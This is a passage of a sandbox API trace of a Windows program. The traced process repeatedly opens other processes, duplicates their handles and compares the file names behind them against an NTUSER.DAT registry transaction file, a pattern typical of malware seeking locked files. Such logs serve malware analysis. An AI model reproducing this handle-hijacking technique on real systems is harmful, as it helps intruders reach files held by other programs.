(hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.234] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.234] CloseHandle (hObject=0x670) returned 1 [0154.234] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.234] CloseHandle (hObject=0x680) returned 1 [0154.234] CloseHandle (hObject=0x62c) returned 1 [0154.234] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x974) returned 0x62c [0154.234] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.235] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.236] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.236] CloseHandle (hObject=0x670) returned 1 [0154.236] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0154.236] CloseHandle (hObject=0x680) returned 1 [0154.236] CloseHandle (hObject=0x62c) returned 1 [0154.236] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x984) returned 0x62c [0154.236] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.236] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.237] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.237] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.238] CloseHandle (hObject=0x670) returned 1 [0154.238] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.238] CloseHandle (hObject=0x680) returned 1 [0154.238] CloseHandle (hObject=0x62c) returned 1 [0154.238] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x984) returned 0x62c [0154.238] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.238] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.239] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.239] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.240] CloseHandle (hObject=0x670) returned 1 [0154.240] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.240] CloseHandle (hObject=0x680) returned 1 [0154.240] CloseHandle (hObject=0x62c) returned 1 [0154.240] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x994) returned 0x62c [0154.240] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.240] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.242] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.242] CloseHandle (hObject=0x670) returned 1 [0154.242] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.242] CloseHandle (hObject=0x680) returned 1 [0154.243] CloseHandle (hObject=0x62c) returned 1 [0154.243] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x994) returned 0x62c [0154.243] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.243] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.243] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.244] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.244] CloseHandle (hObject=0x670) returned 1 [0154.244] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.244] CloseHandle (hObject=0x680) returned 1 [0154.244] CloseHandle (hObject=0x62c) returned 1 [0154.244] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0154.244] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.244] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.245] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.246] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.246] CloseHandle (hObject=0x670) returned 1 [0154.246] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.246] CloseHandle (hObject=0x680) returned 1 [0154.246] CloseHandle (hObject=0x62c) returned 1 [0154.246] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0154.246] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.246] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.247] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.248] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.248] CloseHandle (hObject=0x670) returned 1 [0154.248] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.248] CloseHandle (hObject=0x680) returned 1 [0154.248] CloseHandle (hObject=0x62c) returned 1 [0154.248] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0154.248] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.248] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.249] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.249] CloseHandle (hObject=0x670) returned 1 [0154.249] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.249] CloseHandle (hObject=0x680) returned 1 [0154.249] CloseHandle (hObject=0x62c) returned 1 [0154.249] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0154.249] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.250] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.250] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.251] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.251] CloseHandle (hObject=0x670) returned 1 [0154.251] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.251] CloseHandle (hObject=0x680) returned 1 [0154.251] CloseHandle (hObject=0x62c) returned 1 [0154.251] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0154.251] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.251] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.252] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.253] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.253] CloseHandle (hObject=0x670) returned 1 [0154.253] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.253] CloseHandle (hObject=0x680) returned 1 [0154.253] CloseHandle (hObject=0x62c) returned 1 [0154.253] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0154.253] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.254] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.254] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.254] CloseHandle (hObject=0x670) returned 1 [0154.255] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.255] CloseHandle (hObject=0x680) returned 1 [0154.255] CloseHandle (hObject=0x62c) returned 1 [0154.255] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0154.255] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.255] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.256] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.256] CloseHandle (hObject=0x670) returned 1 [0154.256] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.256] CloseHandle (hObject=0x680) returned 1 [0154.256] CloseHandle (hObject=0x62c) returned 1 [0154.256] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0154.256] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.257] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.257] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.258] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.258] CloseHandle (hObject=0x670) returned 1 [0154.258] CloseHandle (hObject=0x680) returned 1 [0154.258] CloseHandle (hObject=0x62c) returned 1 [0154.258] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0154.258] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.259] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.261] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.261] CloseHandle (hObject=0x670) returned 1 [0154.261] CloseHandle (hObject=0x680) returned 1 [0154.261] CloseHandle (hObject=0x62c) returned 1 [0154.261] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0154.261] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.262] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.263] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.263] CloseHandle (hObject=0x670) returned 1 [0154.263] CloseHandle (hObject=0x680) returned 1 [0154.263] CloseHandle (hObject=0x62c) returned 1 [0154.263] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0154.263] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.263] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.264] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.265] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.265] CloseHandle (hObject=0x670) returned 1 [0154.265] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.265] CloseHandle (hObject=0x680) returned 1 [0154.265] CloseHandle (hObject=0x62c) returned 1 [0154.265] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0154.265] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.266] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.267] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.267] CloseHandle (hObject=0x670) returned 1 [0154.267] CloseHandle (hObject=0x680) returned 1 [0154.267] CloseHandle (hObject=0x62c) returned 1 [0154.267] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0154.267] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.267] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.268] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.269] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.269] CloseHandle (hObject=0x670) returned 1 [0154.269] CloseHandle (hObject=0x680) returned 1 [0154.269] CloseHandle (hObject=0x62c) returned 1 [0154.269] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.269] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.269] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.270] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.270] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.270] CloseHandle (hObject=0x670) returned 1 [0154.270] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0154.270] CloseHandle (hObject=0x680) returned 1 [0154.270] CloseHandle (hObject=0x62c) returned 1 [0154.270] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.271] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.271] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.271] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.272] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.272] CloseHandle (hObject=0x670) returned 1 [0154.272] CloseHandle (hObject=0x680) returned 1 [0154.272] CloseHandle (hObject=0x62c) returned 1 [0154.272] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.272] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.272] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.273] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.274] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.274] CloseHandle (hObject=0x670) returned 1 [0154.274] _wcsicmp (_Str1="\\RacMetaData.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0154.274] CloseHandle (hObject=0x680) returned 1 [0154.274] CloseHandle (hObject=0x62c) returned 1 [0154.274] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.274] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.274] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.275] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.275] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.275] CloseHandle (hObject=0x670) returned 1 [0154.276] _wcsicmp (_Str1="\\RacDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0154.276] CloseHandle (hObject=0x680) returned 1 [0154.276] CloseHandle (hObject=0x62c) returned 1 [0154.276] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.276] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.276] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.276] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.277] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.277] CloseHandle (hObject=0x670) returned 1 [0154.277] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0154.277] CloseHandle (hObject=0x680) returned 1 [0154.277] CloseHandle (hObject=0x62c) returned 1 [0154.277] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.277] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.277] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.278] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.279] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.279] CloseHandle (hObject=0x670) returned 1 [0154.279] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0154.279] CloseHandle (hObject=0x680) returned 1 [0154.279] CloseHandle (hObject=0x62c) returned 1 [0154.279] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.279] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.279] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.280] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.280] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.281] CloseHandle (hObject=0x670) returned 1 [0154.281] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0154.281] CloseHandle (hObject=0x680) returned 1 [0154.281] CloseHandle (hObject=0x62c) returned 1 [0154.281] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0154.281] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.281] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 